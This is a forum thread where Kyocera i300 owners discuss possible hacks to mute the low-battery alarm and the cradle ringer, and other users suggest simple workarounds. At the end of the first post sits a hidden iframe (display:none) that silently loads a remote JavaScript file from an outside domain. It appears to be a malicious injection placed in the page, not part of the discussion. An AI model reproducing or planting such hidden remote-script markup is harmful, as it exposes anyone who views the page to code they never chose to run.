+ Reply to Thread

Request to Jake or anyone for one more hack

I pretty much have everything I want in the i300. It's been a year since I got it, been very happy. As far as I can tell, I have only one request (that is relatively easy to do by hack). I would LOVE to be able to shut the damn thing up when my battery is low/almost depleted. The loud irritating noise infuriates me, because I often want to keep using my phone until it runs out. Can anyone (hint: Jake) come up with a hack for this?

And if you're still looking for something to do, I would like to override the feature that makes it ring EVEN THOUGH THE PHONE IS SET TO VIBRATE when the phone is in the cradle. I hate that, too (though some like it... but a hack would obviously be appropriate).

I think these hacks are likely to be useful on the i300 and i500 and (as far as the former one, because it's a Sprint thing, I think), the Kyocera 7135.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Gadget Lover
    i don't see either of these hacks being created... simply because they are almost useless. The first one is only useful for people that really want to answer the phone or call somebody when their battery is almost dead on a regular basis and don't care that their call is most likely going to be dropped. Plus by removing the low battery alert... you might find yourself saying... GOD I WISH I KNEW THAT MY BATTERY WAS LOW

As for the second hack... if you're going to put your phone in the cradle. Hit the volume up button once before hand, and POW! problem solved. That was just too easy

Administrator

Arrow

wow it has been a year! man has time flown...

in regards to yur post:

1. make sure you have both batts.. that will eliminate hte low batt problem... beter yet, get a couple more.. they are inexpensive right now...

2. just turn the phone off if you dont want to hear it!

easy fixes until someone answers your requests...

1. I can't always carry two batteries, and even I did the problem is not eliminated. If you've ever tried using your phone once it hits the low battery indicators, you were probably surprised at how much life the battery still has at that point. It's quite a bit. Like I said, this feature drives me nuts. The other day I hit this point and just wanted to keep the phone on in case of an emergency (was 1 hour away from home in car -- it would have made it easily), but it annoyed me death with the beeping.

2. I agree I could just change the volume. But the beauty of this hack is that I don't have to. Hacks are to make our lives easier, no?